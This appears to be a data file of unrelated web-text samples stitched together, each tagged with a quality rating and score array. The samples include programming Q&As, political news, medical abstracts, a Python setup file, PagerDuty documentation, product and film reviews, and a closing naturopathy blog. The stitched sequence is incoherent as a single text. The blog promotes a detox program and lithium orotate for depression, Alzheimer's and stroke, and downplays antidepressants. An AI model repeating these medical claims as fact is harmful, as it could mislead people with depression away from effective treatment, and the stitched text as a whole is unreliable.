Q: Getting extremely low loss in a bidirectional RNN? I have implemented a bi-directional RNN in TensorFlow using a BasicLSTMCell and rnn.bidirectional_rnn. I am calculating the loss using seq2seq.sequence_loss_by_example after concatenating the outputs I receive. My application is a next character predictor. I getting an extremely low cost, (~50 times lesser than the unidirectional RNN). I suspect I've made a mistake in the seq2seq.sequence_loss_by_example step. Here is my model - # Model begins cell_fn = rnn_cell.BasicLSTMCell cell = fw_cell = cell_fn(args.rnn_size, state_is_tuple=True) cell2 = bw_cell = cell_fn(args.rnn_size, state_is_tuple=True) input_data = tf.placeholder(tf.int32, [args.batch_size, args.seq_length]) targets = tf.placeholder(tf.int32, [args.batch_size, args.seq_length]) initial_state = fw_cell.zero_state(args.batch_size, tf.float32) initial_state2 = bw_cell.zero_state(args.batch_size, tf.float32) with tf.variable_scope('rnnlm'): softmax_w = tf.get_variable("softmax_w", [2*args.rnn_size, args.vocab_size]) softmax_b = tf.get_variable("softmax_b", [args.vocab_size]) with tf.device("/cpu:0"): embedding = tf.get_variable("embedding", [args.vocab_size, args.rnn_size]) input_embeddings = tf.nn.embedding_lookup(embedding, input_data) inputs = tf.unpack(input_embeddings, axis=1) outputs, last_state, last_state2 = rnn.bidirectional_rnn(fw_cell, bw_cell, inputs, initial_state_fw=initial_state, initial_state_bw=initial_state2, dtype=tf.float32) output = tf.reshape(tf.concat(1, outputs), [-1, 2*args.rnn_size]) logits = tf.matmul(output, softmax_w) + softmax_b probs = tf.nn.softmax(logits) loss = seq2seq.sequence_loss_by_example([logits], [tf.reshape(targets, [-1])], [tf.ones([args.batch_size * args.seq_length])], args.vocab_size) cost = tf.reduce_sum(loss) / args.batch_size / args.seq_length lr = tf.Variable(0.0, trainable=False) tvars = tf.trainable_variables() grads, _ = tf.clip_by_global_norm(tf.gradients(cost, tvars), args.grad_clip) optimizer = tf.train.AdamOptimizer(lr) train_op = optimizer.apply_gradients(zip(grads, tvars)) A: I think there is no any mistake in your code. The problem is the objective function with the Bi-RNN model in your application (next character predictor). The unidirectional RNN (such as ptb_word_lm or char-rnn-tensorflow), it is really a model used for the prediction, for example, if raw_text is 1,3,5,2,4,8,9,0, then, your inputs and target will be: inputs: 1,3,5,2,4,8,9 target: 3,5,2,4,8,9,0 and the prediction is (1)->3, (1,3)->5, ..., (1,3,5,2,4,8,9)->0 But in Bi-RNN, the first prediction is really not just (1)->3, because the output[0] in your code contians the reverse information of the raw_text by use bw_cell (also not (1,3)->5, ..., (1,3,5,2,4,8,9)->0). A similar example is: I tell you that flower is a rose, and than I let you to predict what the flower is? I think you can give me the right answer very easy, and this is also the reason why you getting an extremely low loss in your Bi-RNN model for the application. In fact, I think Bi-RNN (or Bi-LSTM) is not an appropriate model for the application of next character predictor. Bi-RNN need the full sequence when it works, you will find you can't use this model easily when you want to predict the next character.
Low
[ 0.53125, 27.625, 24.375 ]
Why Driving a Surplus Military Truck May Not Be a Good Idea While this happened a while ago, I’ve been having fun with lots of other posts. Anyhow, here goes. Huntington Beach, CA police had an eventful night on September 10. Officers responded to a call of a suspicious military vehicle around 7:45 p.m. They found an elderly man driving a surplus military transport truck through town. Early on, officers heard several loud pops. These turned out to be backfires. This elderly man led police on a chase for a short distance, reaching speeds of up to 10 mph. Yes, 10 mph! When the man arrived at his business, the police arrested the man for failure to yield to an emergency vehicle. The unnamed man was released later that evening. Maybe driving something this large through town ISN’T such a good idea…
Low
[ 0.536687631027253, 32, 27.625 ]
Q: Write values to cells in Excel dynamically in Python I am using the openpyxl method to write values in Python to Excel. I have around 30 integer values in python which I want to dynamically write to specific Excel cells. For example, value1-value5 should be written to B1-B5, when this is complete, we should move to the next column and write value6-value10 in cells C1-C5. I am using the below code, but need help making it dynamic #create workbook object wb=openpyxl.load_workbook("report.xlsx") type (wb) #get sheet names wb.get_sheet_names() #create reference for sheet on which to write worksheet= wb.get_sheet_by_name("Sheet1") #use sheet reference and write the cell address **worksheet["B1"]=value1** #this part needs to be automated #save workbook wb.save("report.xlsx") A: If you want to create these reference strings dynamically this will help: column, row = 66, 1 for v in values: if row == 6: row = 1 column += 1 worksheet['{}{}'.format(chr(column),row)] = value row += 1 This will start with B1 and once it reaches B5 it will move to C1 and so on. Doesn't work after column Z.
Mid
[ 0.616666666666666, 27.75, 17.25 ]
Q: A sum of eigenvalues Let $X$ be an $n\times n$ symmetric matrix. Suppose $\lambda_1(X)\geq \lambda_2(X) \geq \cdots \geq \lambda_n(X)$ are eigenvalues of $X$. Let $r$ be any integer with $1\leq r\leq n$. It is well-known that $\sum_{i=1}^r \lambda_i(X)$ is convex. Now, my question is: Is the following function convex? $$\sum_{i=1}^r \max(0,\lambda_i(X))$$ Thanks! A: The answer is yes, because your function (let me call it $f$) is the maximum of convex functions. As such, it is convex. The formula : $$f(X)=\max\left(0,\max_{1\le r\le n}\sum_{j=1}^r\lambda_j(X)\right).$$
High
[ 0.680161943319838, 31.5, 14.8125 ]
DETROIT (Reuters) - Democratic presidential front-runner Joe Biden and Senator Cory Booker traded accusations over their criminal justice records on Wednesday, with Booker calling the former U.S. vice president an “architect of mass incarceration” and Biden slamming Newark’s “stop and frisk” policing when Booker was mayor. Democratic U.S. Presidential candidate Joe Biden addresses the audience during the Presidential candidate forum at the annual convention of the National Association of the Advancement of Colored People (NAACP) in Detroit, Michigan, U.S. July 24, 2019. REUTERS/Rebecca Cook Booker, who has been lagging in the polls, criticized Biden’s new criminal justice plan and referenced his role as a U.S. senator in writing the 1994 crime bill, which critics say led to high incarceration rates that unfairly hit minorities. “For a guy who helped to be an architect of mass incarceration, this is an inadequate solution to what is a raging crisis in our country,” Booker, who is black, told reporters after appearing at the annual NAACP convention in Detroit. Biden responded that when Booker was mayor of New Jersey biggest city, its police department had a “stop and frisk” program that mostly targeted African-American men as officers stopped individuals to search them for weapons or illegal items. “If he wants to go back and talk about records, I’m happy to do that,” Biden told reporters after speaking at the same convention. “But I’d rather talk about the future.” Biden’s deputy campaign manager Kate Bedingfield later responded with a statement raising questions about Booker’s record as mayor of Newark, a majority African-American city he led from 2006 to 2013. “The absurdity of this attack is obvious. Almost 90% of all people incarcerated in America are in state and local prisons and jails for violating state laws – laws that Joe Biden, of course, did not write,” she said. Ten presidential candidates addressed the nation’s largest civil rights organization, a week before the second presidential debates in Detroit. Democrats have intensified their efforts to win over black voters, one of the party’s most loyal constituencies, after the first decline in African-American turnout in 20 years in the 2016 election. That helped sink Hillary Clinton and contribute to Trump’s upset win. Slideshow ( 13 images ) Neither Biden nor Booker directly attacked each other in their speeches at the convention, saving their criticisms for comments to reporters afterward. BIDEN DEFENDS CIVIL RIGHTS RECORD During his appearance, Biden defended his civil rights record and spoke about his close relationship with Barack Obama, the first black U.S. president. “They did a significant background check on me for months with 10 people. I doubt whether they would have picked me if these accusations about me being wrong on civil rights were correct,” Biden said. Biden’s early lead in the nominating contest has been fueled in part by strong support from black voters. But he has slipped in the polls since the first debate last month with U.S. Senator Kamala Harris, who criticized his opposition to federally mandated busing to integrate schools in the 1970s and his willingness to work with segregationist senators. On Tuesday, Biden unveiled a criminal justice plan that reverses several elements of the 1994 crime bill he helped write. “Every major initiative needs to be reformed,” Biden told the convention, calling the 1994 legislation a response to “a giant epidemic in America of violence,” particularly in African-American communities. “We have now a systemic issue and too many African Americans in jail right now, so I think we should shift the whole focus from what we were doing in terms of incarceration to rehabilitation,” he said. Biden’s new plan includes measures to end racial disparities in the criminal justice system, such as providing greater access to better public defenders, ending mandatory-minimum sentences and scrapping the cash bail system. Booker said the new plan was too little, too late, however. “For him not to have a more comprehensive plan to deal with this is unacceptable to me, especially because he is partially responsible for the crisis we have now,” he told reporters. Delegates to the convention on Tuesday endorsed the impeachment of Republican President Donald Trump. Trump declined an invitation to appear, telling reporters last week that was because the NAACP changed the date and format of his appearance. He wanted to give a speech, he said, but the group said he had to participate in the same question-and-answer format as the other candidates.
Mid
[ 0.6213333333333331, 29.125, 17.75 ]
Category: face cream Pigmentation spots and patches can make the appearance of your skin dull and uneven. It is nothing less than a nightmare for women because concealing hyper-pigmentation can be a bit too difficult. There are several products in the market that… Sure, we all know that using skincare products is important. But a vast majority of us aren’t aware of the correct methods to apply skin care products. These cosmetic items are made to enhance and polish your appearance. But using… We are all aware of the hype surrounding facial serums but most of us are still unsure about when to apply them, how frequently or whether at all. People troubled by dryness often overdo it in their attempts to moisturize… Top dermatologists reveal the seven biggest skin care mistakes you’re probably making when it comes to looking after your skin. Have you ever looked at your old photos and cringe because of all those horror beauty and skin care mistakes you made?… The best face care in the winter is Face Cleanser, Face Mask, Face Moisturizer. Which can be used through out the year, but this face care works great in the winters days. Noreva exfoliac Face Cleanser – The dermatological laboratories…
Low
[ 0.46055979643765904, 22.625, 26.5 ]
Determination of fetal maturity and of development of the fetal lungs by means of combined methods. The validity of the assessment of the fetal age and pulmonary maturity was evaluated on 369 patients at various stages of normal pregnancy and complicated by diabetes, toxemia and fetal anencephaly. Gestational maturity was assessed by ultrasonic measurement of the fetal biparietal diameter and by analysing constituents of amniotic fluid (creatinine, bilirubin, fat cells) while pulmonary maturity was assessed from the L/S ratio in the amniotic fluid. Each individual method has a wide margin of error, however, ultrasound cephalometry gave the best prediction for determination of fetal age. In 135 selected cases lung maturity was assessed by using two techniques, a thin layer chromatographic determination of the lecithin/sphingomyelin ratio in the amniotic fluid and a rapid semiquantitative test to determine the titre of surfactant which generates stable foam in presence of ethanol. The results obtained by the two methods correlated well and were reliable in predicting the respiratory distress syndrome. It appears that these methods make it possible to obtain greater margins of reliability. The role of fetal and maternal factors in the maturation of fetal lungs was also studied in several pathological conditions and it was noted that in many cases of maternal diabetes mellitus lung maturity was reached at a later age than in normal pregnancies. It is condluded that if termination of pregnancy is indicated, the physician should rely more on the assessment of lung maturity than on indicators of gestational age.
High
[ 0.6737120211360631, 31.875, 15.4375 ]
Cardiopulmonary resuscitation policies in northwest England hospices: a telephone survey. A survey into existence of resuscitation policies in hospices in Northwest England. All 25 hospices in the region were contacted. The clinical services manager or equivalent person was interviewed by telephone by means of a structured questionnaire. The telephone survey had a 96% response rate. Sixteen (67%) hospices did not have a resuscitation policy although 50% of this group were developing a policy. Only eight (33%) hospices had a formal policy at the time of interview. Twenty hospices (83%) provided staff with annual training in basic resuscitation. One hospice (4%) discussed cardiopulmonary resuscitation (CPR) with all patients admitted, whereas six (25%) discussed CPR only if the patient raised the topic. Five hospices (21%) would advise the patients that they should be cared for in an acute hospital, as no resuscitation would be provided. Only four hospices (17%) had written information on resuscitation. There was significant variation in the production and adherence to guidelines on resuscitation, with some patients being denied access to specialist palliative care units, as they would wish resuscitation. Much anxiety and confusion regarding this topic existed and staff clearly required further education and guidance in order to develop policies within their units and to provide standard treatment within all specialist palliative care units.
High
[ 0.6683046683046681, 34, 16.875 ]
[Phytoecdysteroids of Rhaponticum uniflorum root]. Three phytoecdysteroids I, II and III were isolated from the root of Rhaponticum uniflorum (L.) DC. and their structures were elucidated by chemical and spectroscopic methods (UV, IR, EI-MS, FAB-MS, 1HNMR, 13CNMR, 1H-1H COSY, 1H-1H NOESY, 1H-13CCOSY and CD). Compound II is new and named rhapontisterone, its structure was confirmed as (20R, 22R, 24S)-2 beta, 3 beta, 11 alpha, 14 alpha, 20, 22, 24-heptahydroxy-5 beta cholest-7-en-6-one. The other two, I and III, were identified as ecdysterone and turkesterone, respectively, both are known compounds, but turkesterone was isolated for the first time from the title plant.
Mid
[ 0.630872483221476, 35.25, 20.625 ]
Cytologic diagnosis of syphilitic pleuritis: a case report. We report on a case of a 68-yr-old man with secondary syphilis diagnosed by biopsy of skin lesions, who concomitantly suffered from left lower lobe pneumonia with associated pleuritis. Cytologic examination of the pleural fluid was diagnostic of syphilis, not only by the characteristic cytomorphology but also by demonstration of spirochetes by the May-Grünwald-Giemsa (MGG) and Steiner staining methods. This suggests that the pneumonia was also syphilitic. The patient was seropositive for HIV-I, but this probably did not contribute to the thoracic manifestations of syphilis, as there was no evidence of immunodeficiency by the CD4/CD8 T lymphocyte count. This is the second reported demonstration of Treponema pallidum in a pleural fluid, and the first diagnosed by cytopathologic examination.
High
[ 0.668380462724935, 32.5, 16.125 ]
import os from setuptools import setup def read(fname): return open(os.path.join(os.path.dirname(__file__), fname)).read() setup( name = "pysymemu", version = "0.0.1-alpha", author = "Felipe Andres Manzano", author_email = "[email protected]", description = ("A tool for symbolic execution of Intel 64 binaries."), requires = ['pyelftool', 'capstone' ], provides = ['pysymemu'], license = "BSD", url = 'http://github.com/pysymemu', download_url= 'http://github.com/', platforms = ['linux', 'win32', 'win64'], keywords = "testing reverse enginering symbolic execution white box fuzzing automatic test case generation", long_description=read('README.md'), classifiers=[ "Development Status :: 3 - Alpha", "Environment :: Console", "Intended Audience :: Developers", "Intended Audience :: Science/Research", "License :: OSI Approved :: BSD License", "Natural Language :: English", "Operating System :: POSIX :: Linux", "Programming Language :: Python :: 2.7", "Topic :: Software Development :: Testing" "Topic :: Software Development :: Libraries :: Python Modules", "Topic :: Software Development :: Quality Assurance", ], test_suite="test", )
Mid
[ 0.596774193548387, 27.75, 18.75 ]
Support Recent Posts Archive Dynamic Notifications Accessing this feature Legacy Lite and Basic plans do not have access to Dynamic Notifications. If you would like to use to this feature, please contact our Sales team to switch to any of our current plans. Event/Alert Severity Levels Alerts in PagerDuty can be generated with a severity field. These severity values can be directly provided from the triggering monitoring tool, or set using event rules. When an incident is generated from an alert, the alert’s severity field is used to determine the urgency level. The values of this field must be one of the following: critical, error, warning, or info. Note that this is case sensitive, so Info will not work. Urgency mapping works as follows: Alert Severity Description Default Incident Urgency Incident Behavior critical A failure in the system's primary application. High Uses high-urgency notification rules and escalates if not acknowledged. error Any error which is fatal to the operation, but not the service or application. High Uses high-urgency notification rules and escalates if not acknowledged. warning May indicate that an error will occur if action is not taken. Low Uses low-urgency notification rules and does not automatically escalate. Uses low-urgency notification rules and does not automatically escalate. Unknown Automatically chosen when a monitoring tool is not setting or can not set the severity High Uses high-urgency notification rules and escalates if not acknowledged. Severity to Urgency mappings are hard-coded (as shown below). Any incoming events that do not contain a Severity will default to High Urgency. Using Severity to Control Urgency In order to use this capability, go to a Service’s settings page and switch “How should responders be notified” to “Use alert severity to determine how responders are notified for each incident”: Any alert-created incidents on the service will now determine their notification urgency according to the Severity of the alerts that create them. When an alert is added to an incident, or when an alert’s severity changes, it will also update its corresponding incident’s Notification Urgency, but only upward. For example, an alert changing from Warning to Critical will change the associated incident from Low to High, but another change from Critical to Warning will not down-urgency the incident. Non-alert incidents, such as those manually triggered or triggered through the Create Incidents API, will always have their urgency set by the service’s setting. Defined Support Hours Users can also take advantage of Dynamic Notifications in relation to defined support hours on a service. Defined support hours can be configured by editing the settings on the service in question. Customers can also base their Notification Urgencies off of time of day. Here, the user can set specific support hours, and decide how they want to be notified inside and outside of this time window. The user can select either High, or Low, or Dynamic Notifications. When support hours end, users also have the option to either leave Incidents at their current Urgency, or raise the Urgency of all triggered incidents for the Service to High. Upgrading Incident Notification Urgency If multiple trigger events come in for the same alert, the alert will upgrade its severity value to the most severe value. For example, if an alert was initially triggered by a Warning event, but then a Critical event comes in, the alert will now be Critical, and the associated incident will change from low urgency to high urgency. If a subsequent Info event comes in, the incident will remain High Urgency. It will not downgrade to Low. There are three ways in which multiple alerts can be “bundled” into a single incident. First is by using our Alert Grouping feature. Here, users can group alerts for a set period of time, or until the incident resolves. While Grouping is activated, subsequent alerts will roll-up under the single incident. The incident will adopt the Notification Urgency that corresponds with the most severe alert that is grouped with it. The second way alerts can be "bundled" is by manually merging their parent incidents. Below is an example of two alerts that have been merged into a single incident. In this example, the urgency of the first alert was raised to High by the merge: The third way alerts can be “bundled” to a single incident is using a alert dedup_key. Using a dedup_key, a subsequent alert trigger will replace an existing alert. PagerDuty Common Event Format For integrations already mapped to the PagerDuty Common Event Format (PD-CEF), alerts of varying severities may be generated by default. For most integrations, however, alerts are generated as Critical by default, and event rules must be used to set the desired severity. Recommended Practices For immediately actionable events, set a “critical” or “error” severity. This will ensure that any associated incidents use high-urgency notification channels and escalate if not acknowledged. For actionable events that do not require immediate attention, set a “warning” severity. This will create a low-urgency incident that does not escalate. For non-actionable events, consider suppressing them in addition to setting an “info” severity. Non-actionable events do not require incident response, so in most cases you will want to suppress these. Frequently Asked Questions How does this interact with Incident Priority? Incident Priority and Incident Urgency are separate properties that today, do not influence each other. Currently, “Priority” can be set manually by users on an existing incident or during incident creation via manual creation or the Incident Create API. In the future, the event rules might have the capability to set Priority based on criteria set by the user, but this work is currently unplanned. What if an alert does not have a severity attached? Alerts created prior to November 2016 may not have severity information attached. However, since then, all alerts are generated with severity, and default to Critical if the severity is not specified by the emitting system, by event transformer, or by an event rule. Events sent to the new Events API v2 must have severity specified. What about Email Integrations?Email Integrations will also not send in Severity. We are currently scoping out work to allow users to set Severity for email integrations. Can I customize the mapping of severity to urgency? As of the current date, mappings are not customizable. We intend to build this capability into the platform in future iterations of this feature. How do I set urgency if the monitoring tools does not sent it to PD? You can use the Event Rules engine to set a Severities for incoming alerts on a Service. How does this relate to PagerDuty CEF? Integrations mapped to CEF will automatically send in Severity. Users can always send in Severity information using the Events API v2. How does this relate to Alert Grouping? Alert Grouping is a new feature currently in Beta. Users can group alerts into a single incident, either over a specific time period, or for as long as the incident is open. As new alerts bundle into an incident, we will upgrade the incident Urgency to the most severe alert. We will never downgrade an incidents Urgency. Will Incident Log Entries Update? Yes, we update the ILEs to indicate when incident Urgency is set by Severity, and when incident Urgency is upgraded due to alert Severity.
Low
[ 0.511293634496919, 31.125, 29.75 ]
20 August 2018 | tkmcc-08780 6 | Incredible true story comes with a lot of fictional baggage There's much good about this movie, starting with Ron Stallworth's incredible deception of the Klu Klux Klan. Racism in all its ugliness is powerfully shown. There's a lot of humor at the expense of some really dumb people. Unfortunately, there's a lot wrong with the movie too. Most of this is because the director embellished the true story. I'm not a big fan of directors tinkering with what really happened in order to add their own touch, and then still claim "based on a true story". The result of the tinkering is a very uneven movie, particularly in the apparently "easy" parts of infiltrating the KKK and the "hard" parts where things go wrong. The "easy" parts are, remarkably, mostly the true story. Apparently this wasn't dramatic enough, so a lot of fictional "hard" parts were added to build tension including whole characters and situations. That's bad enough, but the added parts often made no sense, such as having no real origin (like one character's intense suspicions) and no resolution to the dilemma presented - they just seem to go away, are forgotten or have no effect on the inevitable story arc. Many seem to have been thrown in only to make already duped people look even more ridiculous. The characters themselves are, with a few exceptions, just caricatures. It's not hard to figure out what's next since they do exactly what you expect. Eventually the movie just got boring since it all moved to an inevitable and very easy to see end. Ultimately, the movie is maybe an hour of an amazing true and humorous story marred by over an hour of superfluous and poorly executed fiction.
Low
[ 0.46586345381526106, 29, 33.25 ]
CANCELLARA WINS TOUR OF CALIFORNIA PROLOGUE Fabian Cancellara (CSC) confirmed he is the best prologue specialist in the world by storming to victory in the grounds of Stanford University at the Tour of California. The current world time trial champion blasted round the flat and fast course stopping the clock with a time of 3:51.211 at an average speed of 51.428km/h. Bradley Wiggins (High Road) was second fastest but was four seconds off the pace in a time of 3:55.980. Wiggins was disappointed with his performance, admitting he did not time his effort to perfection. David Millar was stunned to be so off the pace. The British time trial champion finished ninth, 8.57 behind Cancellara. His Slipstream team mate Tyler Farrar was third at 5.25 seconds. Last year’s Tour of California winner Levi Leipheimer was fourth at 6.31 seconds. Mark Cavendish (High Road) surprised himself by beating Millar 0.140 of a second to finish eighth. He will now have a shot at taking the overall lead in Monday?s first road stage from Sausalito to Santa Rosa. Not surprisingly Mario Cipollini (Rock Racing) got the biggest cheer when he rolled down the start ramp to start his comeback. Cipollini took the prologue seriously and set a time of 4:08, finishing 44th. Not bad at 40 and after a three year absence.
Mid
[ 0.644067796610169, 33.25, 18.375 ]
As Magic Leap prepares to ship the Magic Leap One later this year, the company is putting its focus on mentoring developers and creators to build a content ecosystem for the spatial computing platform. Registered developers are so important to Magic Leap that they'll be the first group to be able to buy the Magic Leap One when it becomes available later this year, Rio Caraeff, chief content officer for Magic Leap, said in an interview. "Really, it's all about developers and creators. It's really the core of the earth, for me, that everything else blooms and grows from. To me, there's nothing more important than building a healthy ecosystem of developers and creators," said Caraeff during an on-stage interview with Melissa Arnoldi, president of technology and operations at AT&T, during the company's recent technology and entertainment event, AT&T Shape. To accomplish that, Magic Leap has come out of its shell and has become more open with the developer community than it has been in the past. Magic Leap opened its Creator Portal earlier this year and launched an on-going live streaming show on Twitch. "Magic Leap, for a few years, had a reputation of being a little bit private and secretive and insular, but we were an R&D-oriented company that was just starting to develop a product, and now we are at the next phase of turning to go to market, and a big part of that is turning to face our customer, turning to understand and share information with developers, and also have a two-way street back. So, we're very much in the midst of that turn, and my job is to make sure we have great relationships with all of the developers and creators out there and to make sure all of them have the opportunity to build for Magic Leap one day," said Caraeff. When it comes to content for Magic Leap, Caraeff envisions a wide range of creators, from amateur auteurs to professional productions, with user's walls, tables, and rooms becoming the screen on which they experience content. "You're gonna have this time where a six-year-old in Mumbai can take her phone and partially capture her volumetric cat and then share it on Magic Leap. You'll have a whole broad array of user-generated content, and you'll have sixty Red cameras surrounding Taylor Swift at Madison Square Garden, and you'll be able to have her perform in your living room while you cook dinner," said Caraeff. "The world can be my computing environment." In describing the potential of Magic Leap and augmented reality, Caraeff envisions characters and AI with a level of realism unachievable on a flat screen, with characters that react to the presence of users and animated avatars for Siri or Alexa. If that last little bit sounds familiar, it is because NBA player Andre Iguodala's described having a similar experience when he got to preview the Magic Leap headset last year. Image by Recode/YouTube Creators will also have a learning curve with new methods of content capture, such as volumetric light field photography and outside-in photography. Furthermore, Caraeff advises that the process of creating content will differ greatly from moviemaking, game development, or even virtual reality experiences that separate users from their surroundings. "You don't want to introduce too much stuff into my environment. We find that the most magical experiences are those where just a little bit of digital stuff, a little bit of magic, is integrated into my environment," said Caraeff. "Tinkerbell flying around the room and then landing in the palm of your hand is a pretty powerful experience. You don't need to able to take me out of my room; you can introduce wonder and magic and whimsy into my room." During the presentation, Caraeff alludes to the Star Wars sizzle reel produced in conjunction with Lucasfilm and the Screens feature. Other experiences described by Caraeff include shopping apps where users can see how a new pair of Adidas look on their feet or view an outfit from a J. Crew catalog on a virtual avatar. Caraeff also alluded to productivity applications for healthcare professionals to examine virtual patients or architects and engineers to collaborate on designs, not unlike the use cases pitched by Microsoft and Meta Company. "Gaming is interesting, but it's really communication, information, productivity, collaboration, everything I can do on a computer and everything I can do in real life are things I can do in spatial computing on Magic Leap. So, the opportunities are limitless, but the immediate applications are really anything that can benefit from having the digital world integrated into my physical world," said Caraeff. While we know that Weta Workshop is working on a game for Magic Leap One, it is apparent that Magic Leap is concentrating on content and experiences as opposed to gaming for its first generation device. This focus aligns with previously-previewed experiences, such as the NBA app and the interactive musical application Tónandi from Icelandic rock group Sigur Ros. While he did not show off the device (aside from the same still shots shared late last year), Caraeff did take the opportunity to dim expectations a bit when asked to describe the device and the current experience using it. "It is what it is. It's not quite an intimate wearable yet, but for a first-generation product, we think it's great to get this in the hands of developers and creators. But it's important to remember we are at the dawn and the beginning of something new and that this is the next wave of computing and what the next decade and generation will be defined by. So, there's a lot of room for improvement here, but you can see where we are now and we're proud of where we are."
Mid
[ 0.627802690582959, 35, 20.75 ]
Mug Review: The Trudeau Umbria Desk Mug I purchased Trudeau’s Umbria insulated desk mug roughly a month and a half ago. I had been eying it for a long time while surfing Amazon lazily and then I noticed my local Fred Meyer was carrying the mug in it’s insulated mug section. Every time I walked by it I was tempted. Why? Because I don’t like drinking out of a big thermal tumbler in the home and all of the normal coffee mugs I have are nothing special. They’re just ceramic mugs that don’t retain heat in the slightest bit. I like drinking my coffee slowly so I was always drinking tepid coffee or throwing a lot of it out. In any event I was walking through the store in mid-April and saw the mug was on sale for 25% off. I finally bit and picked it up for the super low cost of $6.99. Before I get to the nitty-gritty I want to show you my hands on video review of the Umbria coffee mug and then I’ll share with you details that I’ve tracked over the past month and a half – stuff that isn’t mentioned in the packaging or any sales page online. My Observations & Thoughts On The Umbria Desk Mug Size & Heat Retention First of all the Umbria insulated coffee mug is advertised to hold 15 ounces or 440 ml and it’s tag says 2 hours. The lack of any wording surrounding the two hours makes you assume it will keep your coffee hot for two hours but it’s not clear. From my testing in the kitchen I found the mug to hold 15oz exactly. The last bit was right at the top and it’s probably a bit further than you would fill it naturally but the lid will go on. I would rate the mug as a 14oz container to be on the safe side. As for heat retention, I boiled some water and let it cool to 195 degrees (measured with a thermometer) before pouring it into the mug. I put the lid on the mug in closed position and then waited one hour before testing the temp again. Over the hour without opening it at all (or removing any hot liquid from it) the water measured 153 degrees and felt burning hot (but not scalding hot) to the lips. This is in comparison to my generic 8 ounce coffee cup which dropped from 190 degrees to 140 degrees in the first 15 minutes before falling to 110 degrees after another 30 minutes had past. At the 45 minute mark the water felt tepid to the lips at best and would result in me tossing it if it had been coffee. In the open position you would have to expect the mug to hold heat a little less well and if you were actually drinking from it the temp would fall even faster as you replace hot liquid in the mug with room temperature air. Even still, sipping coffee out of this is far more enjoyable than sipping it from a ceramic cup. I rarely have to think about the temp dropping too fast. When compared to an ordinary coffee mug in the heat retention department the Umbria was by far better all around. Yes, it’s bigger and not as easy to keep clean but that’s besides the point. What Else Is Important? As for cleaning the mug is a single piece of stainless steel on the inside wrapping all the way around the lip area. Basically by drinking out of it you are not slowly introducing liquids to the seam between the plastic exterior and the steel interior. In many cheap mugs this seam is easily compromised and fluids enter the chamber causing a deterioration of the insulative effect and a less sanitary mug overall. I’ve only used the Umbria on a near daily basis for around 45 days so I can’t speak for longevity of the mug first hand but so far I have seen no indications that the quality of this mug is low. It cleans easy, the lid seals tightly and so long as I don’t overfill the mug or tip it over it doesn’t leak. Mind you this is not leak proof – it’s far from that. It is however spill proof so long as you have the lid in place. Do not expect this mug to not splash or dribble on you if you overfill it even in closed position. The lid is not high end engineering so don’t treat it like it is. When it comes to cleaning the lid it’s worth noting that it doesn’t come apart. You can remove the rubberized ring that acts as a seal to clean it and the plastic underneath it but the lid mechanism to open and close it doesn’t come apart. I have just been cleaning mine with soap and water but if you really wanted to clean that mechanism good your best bet is to soak the entire lid in a water/vinegar mixture. Dishwashers are always a no-no for me with mugs like this. You might be able to get away with it but I wouldn’t do it if I cared about keeping the mug in good shape. I know it doesn’t cost a lot but I still have a pride of ownership thing going on. Pricing? Considering the fact that this mug is meant to replace your ceramic coffee cup and not go on outdoor adventures it is not as well made as many of the high end tumblers. I would not consider buying this mug for more than $12 or so. Doing a quick look over at Google Shopping I see the mug is priced anywhere from $10-$20 depending on pricing and the lowest price I see is for the red version of this mug over on Amazon.com. (Prices change all the time though so please check for yourself to see current pricing for accuracy). My local Fred Meyer was selling it for about $9 but I caught it on sale for $7 and would buy it for that any time no questions asked. For the price of “just less than $10” this insulated coffee mug is a steal and worth every penny in my opinion. Even still it’s not for everyone. if you want something in a different style, color, material, or even something with expanded features then make sure to take a look at my page dedicated to insulated coffee mugs for more options and to compare.
Mid
[ 0.643431635388739, 30, 16.625 ]
An article, published in the Washington Post yesterday, speaks to a simple, naturopathic approach to addressing depression symptoms in many people. It also offers further evidence for the Sickness Syndrome Depression phenomenon I have been speaking about for the past ten years..making the connection between inflammation, diet, the gut and mental illnesses like depression. Tomorrow evening at 6:30 PM is our next Purification/Detox kickoff. I will be discussing this 21 day program that lowers inflammation, balances gut microflora, and applies diet principles that are effective in treating depression. A new study in France led by Harvard School of Health professor Marc Weisskopf found that farmers who used weedkillers were more than twice as likely to be treated for depression than farmers who didn’t use the chemicals. Weedkillers are toxic and trigger inflammation in the body that can trigger a matching inflammatory response in the brain that leads to depression and other mental illness. This is referred to as Sickness Syndrome Depression, a term coined years ago when I was seeing the connection in research and in practice. The good news is we have the tools to address this and many other known causes of depression (hint: an antidepressant medication deficiency (e.g. Prozac) is generally not the cause) and relieve people of years of unnecessary suffering. As you stretch into warrior pose and inhale and exhale, you’re not just stretching those hamstrings and lungs; you’re also doing good for your brain with a practice that can stave off or relieve problems such as stress, depression and anxiety. Yoga “gives some sense of sanity,” says Sat Bir Khalsa, a neuroscientist at Harvard Medical School in Boston. “You’re no longer washed away by the avalanche of your emotions. You are more in control.” Yoga practice can also lower heart rate, breathing rate and blood pressure, and may make people less sensitive to pain. In some cases – particularly for anxiety, depression and stress – yoga might be more effective than medication, though this hasn’t been proved, says Dr. Murali Doraiswamy of the Duke University Medical Center in Durham, N.C. While it won’t get rid of whatever is causing you distress, it could make it easier for you to deal with the issues. Doraiswamy compares learning yoga to learning to surf: Once you’ve got the skills, you can ride the wave instead of drowning underneath it. Just like with hormones, it is about balance when it comes to amino acid therapy. The relative amount of one amino acid, like tryptophan, to the others, is what makes the difference when it comes to mental health. Dr. Michael Greger, MD of NutritionFacts.org posted an interesting video about the importance of high tryptophan levels, relative to other amino acids, when it comes to boosting serotonin levels and treating depression. So eating animal protein, for example, isn’t helpful for boosting serotonin, whereas consuming seeds (pumpkin, sesame, butternut squash, etc), which have a particularly beneficial tryptophan to protein ratio, is helpful. I would advise eating raw (and sprouted if possible) seeds, as roasting the seeds alters the amino acid ratios. We have long been testing the blood for amino acid imbalances in patients with mood disorders. Formulating the appropriate amino acid blend to create healthy amino acid balance, based on symptoms and the blood test results, makes a big difference in producing positive change. The most impressive changes I have witnessed in practice are with patients facing the challenges of anxiety, depression and autism disorders. I recently read a good summary by journalist Sheila Casey of the benefits of the mineral lithium orotate (not to be mistaken with the prescription medication lithium carbonate) for protecting the brain from challenges like Alzheimer’s disease, stroke, mood disorders including depression, alcoholism, and brain injury, and to enhance brain function, increasing the number and the quality of new brain cells. Lithium protects the brain against toxins of all kinds, including alcohol, and environmental toxins we all face. At HealthBridge we test the blood for lithium in patients who are challenged with mood disorders and often find an extreme deficiency of this mineral. I will prescribe the mineral when it is appropriate, while monitoring blood tests to make sure thyroid, kidney and liver function remain healthy. 